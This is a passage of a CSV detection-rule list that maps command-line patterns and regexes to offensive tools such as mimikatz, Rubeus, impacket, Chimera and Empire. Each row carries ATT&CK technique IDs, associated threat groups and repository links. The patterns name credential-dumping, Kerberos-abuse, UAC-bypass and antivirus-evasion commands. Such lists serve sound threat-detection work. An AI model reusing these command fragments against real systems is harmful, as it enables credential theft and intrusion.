"* -s * --method 1 --function shell_exec --parameters cmd:id*",".{0,1000}\s\-s\s.{0,1000}\s\-\-method\s1\s\-\-function\sshell_exec\s\-\-parameters\scmd\:id.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2962"
"* -s *ascii* -b *reverse*invoke-expression*",".{0,1000}\s\-s\s.{0,1000}ascii.{0,1000}\s\-b\s.{0,1000}reverse.{0,1000}invoke\-expression.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","2963"
"* -s 127.0.0.1 -e * -a connect -u ntlm*",".{0,1000}\s\-s\s127\.0\.0\.1\s\-e\s.{0,1000}\s\-a\sconnect\s\-u\sntlm.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2964"
"* -s putty.exe_sig *",".{0,1000}\s\-s\sputty\.exe_sig\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2965"
"*' s::l '*",".{0,1000}\'\ss\:\:l\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","2967"
"* s3aclenum.py*",".{0,1000}\ss3aclenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","2969"
"* s3enum.py*",".{0,1000}\ss3enum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","2970"
"* s4u * /bronzebit*",".{0,1000}\ss4u\s.{0,1000}\s\/bronzebit.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2971"
"* s4u * /nopac*",".{0,1000}\ss4u\s.{0,1000}\s\/nopac.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2972"
"* s4u * /ticket:*",".{0,1000}\ss4u\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2973"
"* s4u *.kirbi*",".{0,1000}\ss4u\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2974"
"* s4u */rc4:* ",".{0,1000}\ss4u\s.{0,1000}\/rc4\:.{0,1000}\s","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2975"
"* s7-info.nse*",".{0,1000}\ss7\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2976"
"* -sam * -system * -security * LOCAL > *.out*",".{0,1000}\s\-sam\s.{0,1000}\s\-system\s.{0,1000}\s\-security\s.{0,1000}\sLOCAL\s\>\s.{0,1000}\.out.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2977"
"* sam_reset_all_pw(*",".{0,1000}\ssam_reset_all_pw\(.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2978"
"* samba-vuln-cve-2012-1182.nse*",".{0,1000}\ssamba\-vuln\-cve\-2012\-1182\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2979"
"* sandman_server.py*",".{0,1000}\ssandman_server\.py.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","N/A","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","2980"
"* -SauronEye -Command *",".{0,1000}\s\-SauronEye\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","2981"
"* -save-old -dc-ip *",".{0,1000}\s\-save\-old\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2982"
"* saycheese.sh*",".{0,1000}\ssaycheese\.sh.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","2983"
"* -sc GetSyscallStub *",".{0,1000}\s\-sc\sGetSyscallStub\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2985"
"* -sc SysWhispers3*",".{0,1000}\s\-sc\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","2986"
"* scan * --dc-ip *",".{0,1000}\sscan\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2988"
"* scan --github-org*",".{0,1000}\sscan\s\-\-github\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","2989"
"* scan --github-user*",".{0,1000}\sscan\s\-\-github\-user.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","0","N/A","N/A","8","10","1903","100","2025-03-07T20:15:34Z","2022-11-08T23:09:17Z","2990"
"* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*",".{0,1000}\s\-Scan\s\-ScanType\s3\s\-File\s.{0,1000}\s\-DisableRemediation\s\-Trace\s\-Level\s0x10.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","2991"
"* --scan-local-shares * -e *",".{0,1000}\s\-\-scan\-local\-shares\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","2992"
"* Scanning Eventvwr registry! ..*",".{0,1000}\sScanning\sEventvwr\sregistry!\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2998"
"* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","0","N/A","N/A","10","10","462","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z","2999"
"* ScareCrow.go*",".{0,1000}\sScareCrow\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","3000"
"* --scarecrow-inject *",".{0,1000}\s\-\-scarecrow\-inject\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3001"
"* -SCCMHost * -Outfile *",".{0,1000}\s\-SCCMHost\s.{0,1000}\s\-Outfile\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","3002"
"* -ScheduledTask -OnIdle *",".{0,1000}\s\-ScheduledTask\s\-OnIdle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3003"
"* scmuacbypass.cpp*",".{0,1000}\sscmuacbypass\.cpp.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","3004"
"* scmuacbypass.exe*",".{0,1000}\sscmuacbypass\.exe.{0,1000}","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","0","N/A","N/A","8","1","97","17","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z","3005"
"* --script dns-srv-enum *",".{0,1000}\s\-\-script\sdns\-srv\-enum\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3006"
"* --script http-ntlm-info *",".{0,1000}\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3007"
"* --script smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3008"
"* --script smb-security-mode*smb-enum-shares *",".{0,1000}\s\-\-script\ssmb\-security\-mode.{0,1000}smb\-enum\-shares\s.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","3009"
"* --script smb-vuln-*",".{0,1000}\s\-\-script\ssmb\-vuln\-.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","3010"
"* --script=http-ntlm-info --script-args=http-ntlm-info.root=*",".{0,1000}\s\-\-script\=http\-ntlm\-info\s\-\-script\-args\=http\-ntlm\-info\.root\=.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","0","N/A","N/A","N/A","4","359","57","2024-06-27T11:10:32Z","2019-10-23T06:02:56Z","3012"
"* --script=ldap-search -p *",".{0,1000}\s\-\-script\=ldap\-search\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3013"
"* --script=realvnc-auth-bypass *",".{0,1000}\s\-\-script\=realvnc\-auth\-bypass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3014"
"* --script-args dns-srv-enum.domain=*",".{0,1000}\s\-\-script\-args\sdns\-srv\-enum\.domain\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3015"
"* -ScriptString * -GetMinimallyObfuscated*",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-GetMinimallyObfuscated.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","3016"
"* -ScriptString * -PSAmsiScanner *",".{0,1000}\s\-ScriptString\s.{0,1000}\s\-PSAmsiScanner\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","3017"
